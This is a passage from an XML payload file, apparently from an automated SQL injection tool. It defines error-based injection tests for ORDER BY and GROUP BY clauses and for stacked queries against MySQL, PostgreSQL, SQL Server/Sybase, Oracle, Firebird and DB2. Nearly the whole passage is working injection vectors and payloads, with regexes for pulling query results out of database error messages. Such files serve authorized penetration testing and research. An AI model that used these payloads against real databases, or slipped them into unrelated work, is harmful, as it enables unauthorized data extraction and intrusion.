INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>1323<request>1324<payload>,(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>1325</request>1326<response>1327<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1328</response>1329<details>1330<dbms>MySQL</dbms>1331<dbms_version>>= 5.0</dbms_version>1332</details>1333</test>13341335<test>1336<title>MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)</title>1337<stype>2</stype>1338<level>3</level>1339<risk>1</risk>1340<clause>2,3</clause>1341<where>1</where>1342<vector>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>1343<request>1344<payload>,EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>1345</request>1346<response>1347<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1348</response>1349<details>1350<dbms>MySQL</dbms>1351<dbms_version>>= 5.1</dbms_version>1352</details>1353</test>13541355<test>1356<title>MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)</title>1357<stype>2</stype>1358<level>5</level>1359<risk>1</risk>1360<clause>2,3</clause>1361<where>1</where>1362<vector>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])</vector>1363<request>1364<payload>,UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1])</payload>1365</request>1366<response>1367<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1368</response>1369<details>1370<dbms>MySQL</dbms>1371<dbms_version>>= 5.1</dbms_version>1372</details>1373</test>13741375<test>1376<title>MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>1377<stype>2</stype>1378<level>3</level>1379<risk>1</risk>1380<clause>2,3</clause>1381<where>1</where>1382<vector>,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</vector>1383<request>1384<payload>,(SELECT [RANDNUM] FROM (SELECT ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x))s)</payload>1385</request>1386<response>1387<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1388</response>1389<details>1390<dbms>MySQL</dbms>1391<dbms_version>>= 4.1</dbms_version>1392</details>1393</test>13941395<test>1396<title>PostgreSQL error-based - ORDER BY, GROUP BY clause</title>1397<stype>2</stype>1398<level>3</level>1399<risk>1</risk>1400<clause>2,3</clause>1401<where>1</where>1402<vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>1403<request>1404<payload>,(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>1405</request>1406<response>1407<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1408</response>1409<details>1410<dbms>PostgreSQL</dbms>1411</details>1412</test>14131414<test>1415<title>PostgreSQL error-based - ORDER BY, GROUP BY clause (GENERATE_SERIES)</title>1416<stype>2</stype>1417<level>5</level>1418<risk>1</risk>1419<clause>2,3</clause>1420<where>1</where>1421<vector>,(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>1422<request>1423<payload>,(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>1424</request>1425<response>1426<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1427</response>1428<details>1429<dbms>PostgreSQL</dbms>1430</details>1431</test>14321433<test>1434<title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>1435<stype>2</stype>1436<level>4</level>1437<risk>1</risk>1438<clause>3</clause>1439<where>1</where>1440<vector>,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>1441<request>1442<payload>,(SELECT [RANDNUM] WHERE [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>1443</request>1444<response>1445<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1446</response>1447<details>1448<dbms>Microsoft SQL Server</dbms>1449<dbms>Sybase</dbms>1450</details>1451</test>14521453<test>1454<title>Oracle error-based - ORDER BY, GROUP BY clause</title>1455<stype>2</stype>1456<level>4</level>1457<risk>1</risk>1458<clause>2,3</clause>1459<where>1</where>1460<vector>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>1461<request>1462<payload>,(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>1463</request>1464<response>1465<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1466</response>1467<details>1468<dbms>Oracle</dbms>1469</details>1470</test>14711472<test>1473<title>Firebird error-based - ORDER BY clause</title>1474<stype>2</stype>1475<level>5</level>1476<risk>1</risk>1477<clause>3</clause>1478<where>1</where>1479<vector>,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>1480<request>1481<payload>,(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>1482</request>1483<response>1484<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1485</response>1486<details>1487<dbms>Firebird</dbms>1488</details>1489</test>14901491<test>1492<title>IBM DB2 error-based - ORDER BY clause</title>1493<stype>2</stype>1494<level>5</level>1495<risk>1</risk>1496<clause>3</clause>1497<where>1</where>1498<vector>,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>1499<request>1500<payload>,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>1501</request>1502<response>1503<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1504</response>1505<details>1506<dbms>IBM DB2</dbms>1507</details>1508</test>1509<!--1510TODO: if possible, add payload for SQLite, Microsoft Access1511and SAP MaxDB - no known techniques at this time1512-->1513<!-- End of error-based tests - ORDER BY, GROUP BY clause -->15141515<!-- Error-based tests - stacking -->1516<test>1517<title>Microsoft SQL Server/Sybase error-based - Stacking (EXEC)</title>1518<stype>2</stype>1519<level>2</level>1520<risk>1</risk>1521<clause>1-8</clause>1522<where>1</where>1523<vector>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]</vector>1524<request>1525<payload>;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]</payload>1526<comment>--</comment>1527</request>1528<response>1529<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1530</response>1531<details>1532<dbms>Microsoft SQL Server</dbms>1533<dbms>Sybase</dbms>1534</details>1535</test>1536<!-- End of error-based tests - stacking -->1537</root>153815391540